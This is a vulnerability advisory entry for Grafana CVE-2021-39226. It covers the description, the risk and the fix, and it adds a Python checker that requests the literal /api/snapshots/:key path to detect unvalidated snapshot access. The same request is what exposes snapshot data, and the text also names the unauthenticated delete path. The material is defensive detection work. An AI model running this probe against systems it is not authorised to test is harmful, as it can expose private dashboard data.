Grafana - Authentication Bypass (CVE-2021-39226)
- Severity
- CVSSv3 Score
- 7.3
- Exploitable with Sniper
- No
- Vulnerability description
Grafana server is vulnerable to CVE-2021-39226, an authentication bypass in the dashboard snapshot API. The route parameter in /api/snapshots/:key is not validated, so any user, authenticated or not, who requests the literal path /api/snapshots/:key (sending ":key" as-is instead of a real snapshot key) is served the snapshot with the lowest database key instead of a "not found" error. If the snapshot "public_mode" configuration setting is set to true (the default is false), unauthenticated users can likewise delete the snapshot with the lowest database key by requesting the literal path /api/snapshots-delete/:deleteKey.
- Risk description
The risk exists that a remote unauthenticated attacker could exploit this vulnerability to read sensitive information stored in a dashboard snapshot (panel titles, queries and the data embedded in the snapshot) without knowing its key, or, when public_mode is enabled, delete that snapshot.
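The script below is an added example and is not code from the original advisory or from Grafana Labs. It turns the description above into a non-destructive check: it reads the version string from /api/health (a standard Grafana endpoint) and compares it against the affected range, then requests the literal path /api/snapshots/:key and classifies the answer. A snapshot document coming back for a parameter that was never a real key is the vulnerable case; a 404 is what a patched server (or one with no snapshots at all) returns. The fixed-release list, the function names and the sample responses are assumptions made for this example, and the delete endpoint is deliberately never called.

```python
# Added example (not part of the original advisory or of Grafana's own code):
# a non-destructive check for CVE-2021-39226 built from the advisory text.
import json
import sys
import urllib.error
import urllib.request

# The literal route parameter from the advisory, sent as-is instead of a real key.
LITERAL_PATH = "/api/snapshots/:key"
HEALTH_PATH = "/api/health"  # answers {"version": "x.y.z", ...} on Grafana

# Assumption for this example: fix shipped in 8.1.6 with backports 8.0.7,
# 7.5.11 and 7.4.5; versions 2.0.1 through 8.1.5 are affected.
FIXED_RELEASES = ((8, 1, 6), (8, 0, 7), (7, 5, 11), (7, 4, 5))


def parse_version(version):
    """'8.1.5', '8.1.5-pre' or '7.5' -> (8, 1, 5) / (8, 1, 5) / (7, 5, 0)."""
    core = version.split("-")[0].split("+")[0]
    parts = tuple(int(p) for p in core.split(".")[:3])
    return parts + (0,) * (3 - len(parts))


def version_affected(version):
    """True when the version is inside the affected range and below its line's backport."""
    v = parse_version(version)
    if v < (2, 0, 1) or v > (8, 1, 5):
        return False
    for fixed in FIXED_RELEASES:
        if v[:2] == fixed[:2] and v >= fixed:
            return False  # same minor line, at or past the backported fix
    return True


def classify(status, body):
    """Classify the response to GET /api/snapshots/:key.

    'vulnerable'     : a snapshot document (JSON with a "dashboard" member) was
                       served for the literal parameter, so the key was never checked.
    'not_vulnerable' : 404, which a patched server returns (also returned when the
                       instance simply has no snapshots, so this is not a proof of patching).
    'inconclusive'   : anything else (HTML error pages, proxies, auth walls, ...).
    """
    if status == 200:
        try:
            data = json.loads(body)
        except ValueError:
            return "inconclusive"
        if isinstance(data, dict) and "dashboard" in data:
            return "vulnerable"
        return "inconclusive"
    if status == 404:
        return "not_vulnerable"
    return "inconclusive"


def reported_version(health_body):
    """Extract the version string from an /api/health body, '' if absent or not JSON."""
    try:
        return str(json.loads(health_body).get("version", ""))
    except (ValueError, AttributeError):
        return ""


def fetch(base_url, path, timeout=10):
    """GET base_url + path; return (status, body) even for HTTP error responses."""
    req = urllib.request.Request(base_url.rstrip("/") + path,
                                 headers={"Accept": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check(base_url):
    """Combine the version hint and the live literal-path probe for one target."""
    status, body = fetch(base_url, HEALTH_PATH)
    version = reported_version(body) if status == 200 else ""
    try:
        hint = version_affected(version) if version else None
    except ValueError:  # e.g. a development build string such as "main"
        hint = None
    status, body = fetch(base_url, LITERAL_PATH)
    return {"version": version, "version_affected": hint,
            "literal_path_result": classify(status, body)}


# Constructed sample responses (not captured from a real server) so the
# classifier can be exercised offline.
SAMPLE_VULNERABLE_BODY = json.dumps(
    {"meta": {"isSnapshot": True, "expires": "2099-01-01T00:00:00Z"},
     "dashboard": {"title": "Prod overview", "panels": []}})
SAMPLE_NOT_FOUND_BODY = json.dumps({"message": "Dashboard snapshot not found"})

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("usage: python check_cve_2021_39226.py https://grafana.example.com")
        sys.exit(2)
    print(json.dumps(check(sys.argv[1]), indent=2))
```

The version hint and the probe are reported separately on purpose: the health endpoint can be hidden or fronted by a proxy, and a 404 on the literal path is also what an unpatched server with an empty snapshot table returns, so only the combination of an affected version and a "not_vulnerable" probe should be read as "no snapshots yet" rather than "fixed".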
- Recommendation
Upgrade the Grafana server to a release that contains the fix: 8.1.6, or the backported releases 8.0.7, 7.5.11 and 7.4.5 (versions 2.0.1 through 8.1.5 are affected). Until the upgrade is done, block requests for the literal paths /api/snapshots/:key and /api/snapshots-delete/:deleteKey at a reverse proxy in front of Grafana, since those exact paths have no legitimate use, and keep the snapshot public_mode setting at its default of false so that unauthenticated deletion is not possible.
- References
https://nvd.nist.gov/vuln/detail/CVE-2021-39226
https://github.com/grafana/grafana/security/advisories/GHSA-69j6-29vr-p3j9
- Detectable with
- Network Scanner
- Vuln date
- Oct 2021
- Software Type
- Monitoring solution
- Vendor
- Grafana Labs
- Product
- Grafana
- Codename
- Not available